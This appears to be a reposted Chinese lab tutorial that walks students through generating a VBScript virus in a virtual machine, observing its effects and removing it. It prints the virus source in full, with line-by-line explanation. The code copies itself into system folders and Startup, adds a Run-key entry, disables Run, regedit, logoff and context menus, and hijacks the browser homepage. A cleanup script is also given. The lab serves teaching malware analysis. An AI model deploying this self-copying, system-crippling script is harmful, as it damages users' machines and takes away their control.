碼上歡樂
相關內容    簡體    繁體

腳本病毒編寫實驗

本文轉載自   查看原文   2020-09-07 20:04   651 

實驗目的

了解腳本與腳本病毒的基本概念 明確主要的腳本病毒的種類 掌握常見腳本病毒的原理 熟悉簡單的腳本病毒的編寫方法 利用所提到的工具進行上機實驗,得到實驗結果

實驗原理

腳本程序是用腳本語言編制的程序,即用一條條腳本代碼組成的完整的邏輯指令。腳本代碼是用腳本語言編制的代碼,一般來說腳本代碼和腳本程序有時候通用。

實驗內容

介紹腳本與腳本病毒的基本概念 借助腳本病毒生成器生成腳本病毒 理解生成的腳本病毒的作用機制 修復感染病毒的系統 查看腳本病毒的作用效果

實驗環境描述

1、學生機與實驗室網絡直連;

2、VPC1與實驗室網絡直連;

3、學生機與VPC1物理鏈路連通。

實驗步驟

1、學生單擊實驗拓撲按鈕,進入實驗場景,進入目標主機

2、學生輸入賬號administrator ,密碼123456,登錄到實驗場景中的目標主機。

3、 借助腳本病毒生成器生成腳本病毒

1)、打開桌面上vbs-virus.rar解壓vbs-virus.rar,雙擊打開vir1,以運行vbs腳本病毒生成器,如下圖所示。

圖片描述

2)、腳本病毒生成器界面如下圖所示。

圖片描述

3)、點擊“下一步”,進入“病毒復制選項”設定界面,根據需要進行設定。

圖片描述

4)、點擊“下一步”,進入“禁止功能選項”設定界面,根據需要進行設定

圖片描述

5)、點擊“下一步”,進入“病毒提示對話框”設定界面,根據需要進行設定。

圖片描述

6)、點擊“下一步”,進入“病毒傳播選項”設定界面,根據需要進行設定。

圖片描述

7)、點擊“下一步”,進入“IE修改選項”設定界面,根據需要進行設定。注意,當勾選“設置默認主頁”后,會彈出“設置主頁”對話框,需要用戶輸入欲修改的IE主頁地址。

圖片描述

8)、點擊“下一步”,選擇所生成的腳本病毒存放的位置,點擊“開始制造”,生成病毒。

圖片描述

此時,可看到相應路徑下,已經生成了腳本病毒文件

圖片描述

4、 感染病毒,觀察感染后的系統變化。

1)、將生成的腳本病毒文件置於虛擬機中,雙擊使之運行。然后,為保證完整准確地查看病毒的感染效果,重啟虛擬機中被感染的系統。。

2)、觀察系統文件夾下的異常變化,可以發現,C:\Windows、C:\Windows\system32下多了不明來源的腳本文件。

圖片描述

3)、檢查各項系統功能,發現右鍵菜單功能被禁止。開始菜單內,“運行”命令被去除。在C:\windows下運行注冊表管理器程序regedit.exe,同樣也會彈窗報錯,提示功能被禁。

圖片描述

4)、檢查IE的各項功能,查看異常,會發現IE主頁被惡意篡改。依此單擊“菜單欄——工具——Internet 選項”,發現無法正常打開Internet 選項。另外,IE瀏覽器的右鍵快捷菜單功能也被禁用。

圖片描述

  1. 分析腳本病毒的源碼,理解各條語句的含義

1)、用記事本打開病毒腳本,查看其代碼。代碼內容摘錄如下:

1   On Error Resume Next

2   Set fs=CreateObject("Scripting.FileSystemObject")

3   Set dir1=fs.GetSpecialFolder(0)

4   Set dir2=fs.GetSpecialFolder(1)

5   Set so=CreateObject("Scripting.FileSystemObject")

6   dim r

7   Set r=CreateObject("Wscript.Shell")

8   so.GetFile(WScript.ScriptFullName).Copy(dir1&"\Win32system.vbs")

9   so.GetFile(WScript.ScriptFullName).Copy(dir2&"\ Win32system.vbs")

10  so.GetFile(WScript.ScriptFullName).Copy(dir1&"\Start Menu\Programs\啟動\ Win32system.vbs")

11  r.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",1,"REG_DWORD"

12  r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"REG_DWORD"

13  r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff",1,"REG_DWORD"

14  r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ Win32system "," Win32system.vbs"

15  r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu",1,"REG_DWORD"

16  r.Regwrite

"HKCU\Software\Policies\Microsoft\InternetExplorer\Restrictions\NoBrowserContextMenu",1,"REG_DWORD"

17  r.Regwrite

"HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions",1,"REG_DWORD"

18  r.Regwrite

"HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\Start Page",http://www.ta0ba0.com

2)、分析各條語句含義。主要語句的含義分析如下:

第一行語句的含義是啟用錯誤處理程序,目的在於為了當程序發生錯誤的時候忽略錯誤而繼續向下執行,從而不要打斷程序的執行流程,保證后面的代碼可以執行成功。

第三行和第四行語句中,使用了GetSpecialFolder(folderspec)函數,當參數folderspec等於0時,函數返回值為Windows文件夾(一般為C:\Windows或C:\WINNT);當參數folderspec等於1時,函數返回值為System文件夾(常見於C:\Windows\system32)。

第八行至第十行語句的作用依次為復制病毒文件夾道Windows文件夾、system32文件夾、啟動菜單。

第十一行至第十五行語句的作用依次為禁止“運行”菜單、禁止使用注冊表編輯器、禁止注銷菜單、開機自動運行以及禁止右鍵菜單。

第十六行至第十八行語句的作用依次為禁用IE右鍵菜單、禁止Internet選項、設置默認主頁為http://www.ta0ba0.com。

  1. 編寫解毒腳本,消除病毒影響

1)、打開記事本程序。根據病毒腳本內容,編寫相應的解毒腳本(程序中自帶了reset腳本),內容如下:

1 Set fs=CreateObject("Scripting.FileSystemObject")

2 Set dir1=fs.GetSpecialFolder(0)

3 Set dir2=fs.GetSpecialFolder(1)

4 Set so=CreateObject("Scripting.FileSystemObject")

5 dim r

6 Set r=CreateObject("Wscript.Shell")

7 r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\deltree.exe","start.exe /m deltree /y "&dir1&"\ Win32system.vbs"

8 r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\deltree.exe","start.exe /m deltree /y "&dir2&"\ Win32system.vbs"

9 r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\deltree.exe","start.exe /m deltree /y "&dir1&"\Start Menu\Programs\啟動\ Win32system.vbs"

10r.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",0,"REG_DWORD"

11 r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",0,"REG_DWORD"

12r.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff",0,"REG_DWORD"

13 r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ Win32system ",""

14 r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu",0,"REG_DWORD"

15 r.Regwrite

"HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu",0,"REG_DWORD"

16 r.Regwrite

"HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions",0,"REG_DWORD"

17 r.Regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"

2)、將以上腳本語句保存為一個.vbs的腳本。雙擊運行之,然后重啟系統,即可完成解毒工作。

7.實驗完畢,關閉虛擬機和所有窗口。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 shell腳本編寫實例 js是用什么語言編寫實現的 智能合約編寫實例 Makefile簡單編寫實例 用匯編編寫病毒 python編寫實現抽獎器 怎樣用C語言編寫病毒(一) 怎樣用C語言編寫病毒(二) 腳本編寫 ESP32 NVS存儲讀寫實驗
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM